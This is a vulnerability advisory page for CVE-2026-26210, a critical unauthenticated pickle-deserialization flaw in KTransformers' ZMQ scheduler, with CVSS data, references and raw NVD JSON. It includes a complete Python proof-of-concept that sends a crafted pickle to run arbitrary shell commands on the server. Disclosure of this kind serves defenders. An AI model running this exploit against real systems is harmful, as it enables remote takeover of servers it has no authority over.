CVE-2026-26210

Description

KTransformers through 0.5.3 contains an unsafe deserialization vulnerability in the balance_serve backend mode where the scheduler RPC server binds a ZMQ ROUTER socket to all interfaces with no authentication and deserializes incoming messages using pickle.loads() without validation. Attackers can send a crafted pickle payload to the exposed ZMQ socket to execute arbitrary code on the server with the privileges of the ktransformers process.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kvcache-ai:ktransformers:*:*:*:*:*:*:*:* - VULNERABLE

KTransformers <= 0.5.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zmq
import pickle
import os

def generate_payload(command):
    """Generates a malicious pickle payload."""
    class Exploit(object):
        def __reduce__(self):
            # Execute the command on the target system
            return (os.system, (command,))
    return pickle.dumps(Exploit())

def send_exploit(target_ip, target_port, command):
    """Sends the exploit to the vulnerable ZMQ server."""
    context = zmq.Context()
    # Use DEALER socket to connect to ROUTER
    socket = context.socket(zmq.DEALER)
    socket.connect(f"tcp://{target_ip}:{target_port}")
    
    print(f"[*] Sending payload: {command}")
    payload = generate_payload(command)
    socket.send(payload)
    
    print("[+] Payload sent.")
    socket.close()
    context.term()

if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 5555
    COMMAND = "touch /tmp/pwned"
    
    send_exploit(TARGET_IP, TARGET_PORT, COMMAND)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26210
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26210
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26210/
[4] VulDB https://vuldb.com/cve/CVE-2026-26210
[5] https://chocapikk.com/posts/2026/ktransformers-pickle-rce/
[6] https://github.com/kvcache-ai/ktransformers/pull/1944
[7] https://www.vulncheck.com/advisories/ktransformers-unsafe-deserialization-rce-via-balance-serve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26210", "sourceIdentifier": "[email protected]", "published": "2026-04-23T22:16:26.400", "lastModified": "2026-05-05T14:43:28.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KTransformers through 0.5.3 contains an unsafe deserialization vulnerability in the balance_serve backend mode where the scheduler RPC server binds a ZMQ ROUTER socket to all interfaces with no authentication and deserializes incoming messages using pickle.loads() without validation. Attackers can send a crafted pickle payload to the exposed ZMQ socket to execute arbitrary code on the server with the privileges of the ktransformers process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kvcache-ai:ktransformers:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.5.3", "matchCriteriaId": "D4AAFB24-76AB-4600-9264-67B2445CA09C"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2026/ktransformers-pickle-rce/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/kvcache-ai/ktransformers/pull/1944", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://www.vulncheck.com/advisories/ktransformers-unsafe-deserialization-rce-via-balance-serve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}